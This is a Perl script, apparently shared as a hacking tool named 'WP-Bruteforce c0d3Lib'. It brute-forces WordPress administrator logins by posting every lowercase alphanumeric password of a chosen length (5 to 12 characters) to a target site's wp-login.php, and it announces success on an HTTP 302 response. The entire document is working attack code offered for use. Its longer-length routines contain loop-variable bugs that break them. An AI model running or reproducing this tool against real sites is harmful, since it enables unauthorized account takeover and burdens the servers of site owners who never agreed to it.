#!/usr/bin/perl # WP-Bruteforce c0d3Lib # file : ne0bfwp.pl use LWP::UserAgent; $site = $ARGV[0]; $user = $ARGV[1]; if(@ARGV != 3){ print " WP-Bruteforce c0d3Lib file : ne0bfwp.pl How to use: $0 exe: $0 site.com admin [5 to 12 digits]"; exit; } if ($site !~ /^http:\/\//){ $site = 'http://' . $site; } if ($site !~ /\/wp-login.php/){ $site = $site . '/wp-login.php'; } my $ua = new LWP::UserAgent; my $aphabt = chr(97).chr(98).chr(99).chr(100).chr(101); $aphabt = $aphabt.chr(102).chr(103).chr(104).chr(105); $aphabt = $aphabt.chr(106).chr(107).chr(108).chr(109); $aphabt = $aphabt.chr(110).chr(111).chr(112).chr(113); $aphabt = $aphabt.chr(114).chr(115).chr(116).chr(117); $aphabt = $aphabt.chr(118).chr(119).chr(120).chr(121); $aphabt = $aphabt.chr(122).chr(48).chr(49).chr(50).chr(51).chr(52).chr(53).chr(54).chr(55).chr(56).chr(57); print "\n\nSite: $site\nUsername: $user\n\nAttacking...\n\n"; sleep(2); if($ARGV[2] == 5){ &digitlima; } if($ARGV[2] == 6){ &digitgenap; } if($ARGV[2] == 7){ &digittujuh; } if($ARGV[2] == 8){ &digitselapan; } if($ARGV[2] == 9){ &digitsembilan; } if($ARGV[2] == 10){ &digitsepuluh; } if($ARGV[2] == 11){ &digitsebelasan; } if($ARGV[2] == 12){ &digitduabelasan; } sub digitlima { for (my $i = 0; $i < length($aphabt); $i++){ my $c1 = substr $aphabt, $i, 1; for (my $j = 0; $j < length($aphabt); $j++){ my $c2 = substr $aphabt, $j, 1; for (my $k = 0; $k < length($aphabt); $k++){ my $c3 = substr $aphabt, $k, 1; for (my $l = 0; $l < length($aphabt); $l++){ my $c4 = substr $aphabt, $l, 1; for (my $m = 0; $m < length($aphabt); $m++){ my $c5 = substr $aphabt, $m, 1; my $LPass = $c1.$c2.$c3.$c4.$c5; my $response = $ua->post($site,{ log => $user, pwd => $LPass, wp-submit => 'Log in',}); my $code = $response->code; print "[+] Testing... $LPass\n"; if($code == 302){ print "\n\n\t[*] PASSWORD IS: $LPass\n\n"; exit; } } } } } } } sub digitgenap { for (my $i = 0; $i < length($aphabt); $i++){ my $c1 = substr $aphabt, $i, 1; for (my $j = 0; $j < length($aphabt); $j++){ my $c2 = substr $aphabt, $j, 1; for (my $k = 0; $k < length($aphabt); $k++){ my $c3 = substr $aphabt, $k, 1; for (my $l = 0; $l < length($aphabt); $l++){ my $c4 = substr $aphabt, $l, 1; for (my $m = 0; $m < length($aphabt); $m++){ my $c5 = substr $aphabt, $m, 1; for (my $n = 0; $n < length($aphabt); $n++){ my $c6 = substr $aphabt, $n, 1; my $LPass = $c1.$c2.$c3.$c4.$c5.$c6; my $response = $ua->post($site,{ log => $user, pwd => $LPass, wp-submit => 'Log in',}); my $code = $response->code; print "[+] Testing... $LPass\n"; if($code == 302){ print "\n\n\t[*] PASSWORD IS: $LPass\n\n"; exit; } } } } } } } } sub digittujuh { for (my $i = 0; $i < length($aphabt); $i++){ my $c1 = substr $aphabt, $i, 1; for (my $j = 0; $j < length($aphabt); $j++){ my $c2 = substr $aphabt, $j, 1; for (my $k = 0; $k < length($aphabt); $k++){ my $c3 = substr $aphabt, $k, 1; for (my $l = 0; $l < length($aphabt); $l++){ my $c4 = substr $aphabt, $l, 1; for (my $m = 0; $m < length($aphabt); $m++){ my $c5 = substr $aphabt, $m, 1; for (my $n = 0; $n < length($aphabt); $n++){ my $c6 = substr $aphabt, $n, 1; for (my $o = 0; $o < length($aphabt); $o++){ my $c7 = substr $aphabt, $o, 1; my $LPass = $c1.$c2.$c3.$c4.$c5.$c6.$c7; my $response = $ua->post($site,{ log => $user, pwd => $LPass, wp-submit => 'Log in',}); my $code = $response->code; print "[+] Testing... $LPass\n"; if($code == 302){ print "\n\n\t[*] PASSWORD IS: $LPass\n\n"; exit; } } } } } } } } } sub digitselapan { for (my $i = 0; $i < length($aphabt); $i++){ my $c1 = substr $aphabt, $i, 1; for (my $j = 0; $j < length($aphabt); $j++){ my $c2 = substr $aphabt, $j, 1; for (my $k = 0; $k < length($aphabt); $k++){ my $c3 = substr $aphabt, $k, 1; for (my $l = 0; $l < length($aphabt); $l++){ my $c4 = substr $aphabt, $l, 1; for (my $m = 0; $m < length($aphabt); $m++){ my $c5 = substr $aphabt, $m, 1; for (my $n = 0; $n < length($aphabt); $n++){ my $c6 = substr $aphabt, $n, 1; for (my $o = 0; $o < length($aphabt); $o++){ my $c7 = substr $aphabt, $o, 1; for (my $p = 0; $p < length($aphabt); $p++){ my $c8 = substr $aphabt, $p, 1; my $LPass = $c1.$c2.$c3.$c4.$c5.$c6.$c7.$c8; my $response = $ua->post($site,{ log => $user, pwd => $LPass, wp-submit => 'Log in',}); my $code = $response->code; print "[+] Testing... $LPass\n"; if($code == 302){ print "\n\n\t[*] PASSWORD IS: $LPass\n\n"; exit; } } } } } } } } } } sub digitsembilan { for (my $i = 0; $i < length($aphabt); $i++){ my $c1 = substr $aphabt, $i, 1; for (my $j = 0; $j < length($aphabt); $j++){ my $c2 = substr $aphabt, $j, 1; for (my $k = 0; $k < length($aphabt); $k++){ my $c3 = substr $aphabt, $k, 1; for (my $l = 0; $l < length($aphabt); $l++){ my $c4 = substr $aphabt, $l, 1; for (my $m = 0; $m < length($aphabt); $m++){ my $c5 = substr $aphabt, $m, 1; for (my $n = 0; $n < length($aphabt); $n++){ my $c6 = substr $aphabt, $n, 1; for (my $o = 0; $o < length($aphabt); $o++){ my $c7 = substr $aphabt, $o, 1; for (my $p = 0; $p < length($aphabt); $p++){ my $c8 = substr $aphabt, $p, 1; for (my $q = 0; $q < length($aphabt); $q++){ my $c9 = substr $aphabt, $q, 1; my $LPass = $c1.$c2.$c3.$c4.$c5.$c6.$c7.$c8.$c9; my $response = $ua->post($site,{ log => $user, pwd => $LPass, wp-submit => 'Log in',}); my $code = $response->code; print "[+] Testing... $LPass\n"; if($code == 302){ print "\n\n\t[*] PASSWORD IS: $LPass\n\n"; exit; } } } } } } } } } } } sub digitsepuluh { for (my $i = 0; $i < length($aphabt); $i++){ my $c1 = substr $aphabt, $i, 1; for (my $j = 0; $j < length($aphabt); $j++){ my $c2 = substr $aphabt, $j, 1; for (my $k = 0; $k < length($aphabt); $k++){ my $c3 = substr $aphabt, $k, 1; for (my $l = 0; $l < length($aphabt); $l++){ my $c4 = substr $aphabt, $l, 1; for (my $m = 0; $m < length($aphabt); $m++){ my $c5 = substr $aphabt, $m, 1; for (my $n = 0; $n < length($aphabt); $n++){ my $c6 = substr $aphabt, $n, 1; for (my $o = 0; $o < length($aphabt); $o++){ my $c7 = substr $aphabt, $o, 1; for (my $p = 0; $p < length($aphabt); $p++){ my $c8 = substr $aphabt, $p, 1; for (my $q = 0; $q < length($aphabt); $q++){ my $c9 = substr $aphabt, $q, 1; for (my $r = 0; $r < length($aphabt); $r++){ my $c10 = substr $aphabt, $r, 1; my $LPass = $c1.$c2.$c3.$c4.$c5.$c6.$c7.$c8.$c9.$c10; my $response = $ua->post($site,{ log => $user, pwd => $LPass, wp-submit => 'Log in',}); my $code = $response->code; print "[+] Testing... $LPass\n"; if($code == 302){ print "\n\n\t[*] PASSWORD IS: $LPass\n\n"; exit; } } } } } } } } } } } } sub digitsebelasan { for (my $i = 0; $i < length($aphabt); $i++){ my $c1 = substr $aphabt, $i, 1; for (my $j = 0; $j < length($aphabt); $j++){ my $c2 = substr $aphabt, $j, 1; for (my $k = 0; $k < length($aphabt); $k++){ my $c3 = substr $aphabt, $k, 1; for (my $l = 0; $l < length($aphabt); $l++){ my $c4 = substr $aphabt, $l, 1; for (my $m = 0; $m < length($aphabt); $m++){ my $c5 = substr $aphabt, $m, 1; for (my $n = 0; $n < length($aphabt); $n++){ my $c6 = substr $aphabt, $n, 1; for (my $o = 0; $o < length($aphabt); $o++){ my $c7 = substr $aphabt, $o, 1; for (my $p = 0; $p < length($aphabt); $p++){ my $c8 = substr $aphabt, $p, 1; for (my $q = 0; $q < length($aphabt); $q++){ my $c9 = substr $aphabt, $q, 1; for (my $r = 0; $r < length($aphabt); $r++){ my $c10 = substr $aphabt, $r, 1; for (my $s = 0; $r < length($aphabt); $r++){ my $c11 = substr $aphabt, $r, 1; my $LPass = $c1.$c2.$c3.$c4.$c5.$c6.$c7.$c8.$c9.$c10.$c11; my $response = $ua->post($site,{ log => $user, pwd => $LPass, wp-submit => 'Log in',}); my $code = $response->code; print "[+] Testing... $LPass\n"; if($code == 302){ print "\n\n\t[*] PASSWORD IS: $LPass\n\n"; exit; } } } } } } } } } } } } } sub digitduabelasan { for (my $i = 0; $i < length($aphabt); $i++){ my $c1 = substr $aphabt, $i, 1; for (my $j = 0; $j < length($aphabt); $j++){ my $c2 = substr $aphabt, $j, 1; for (my $k = 0; $k < length($aphabt); $k++){ my $c3 = substr $aphabt, $k, 1; for (my $l = 0; $l < length($aphabt); $l++){ my $c4 = substr $aphabt, $l, 1; for (my $m = 0; $m < length($aphabt); $m++){ my $c5 = substr $aphabt, $m, 1; for (my $n = 0; $n < length($aphabt); $n++){ my $c6 = substr $aphabt, $n, 1; for (my $o = 0; $o < length($aphabt); $o++){ my $c7 = substr $aphabt, $o, 1; for (my $p = 0; $p < length($aphabt); $p++){ my $c8 = substr $aphabt, $p, 1; for (my $q = 0; $q < length($aphabt); $q++){ my $c9 = substr $aphabt, $q, 1; for (my $r = 0; $r < length($aphabt); $r++){ my $c10 = substr $aphabt, $r, 1; for (my $s = 0; $r < length($aphabt); $r++){ my $c11 = substr $aphabt, $r, 1; for (my $s = 0; $r < length($aphabt); $r++){ my $c12 = substr $aphabt, $r, 1; my $LPass = $c1.$c2.$c3.$c4.$c5.$c6.$c7.$c8.$c9.$c10.$c11.$c12; my $response = $ua->post($site,{ log => $user, pwd => $LPass, wp-submit => 'Log in',}); my $code = $response->code; print "[+] Testing... $LPass\n"; if($code == 302){ print "\n\n\t[*] PASSWORD IS: $LPass\n\n"; exit; } } } } } } } } } } } } } } exit;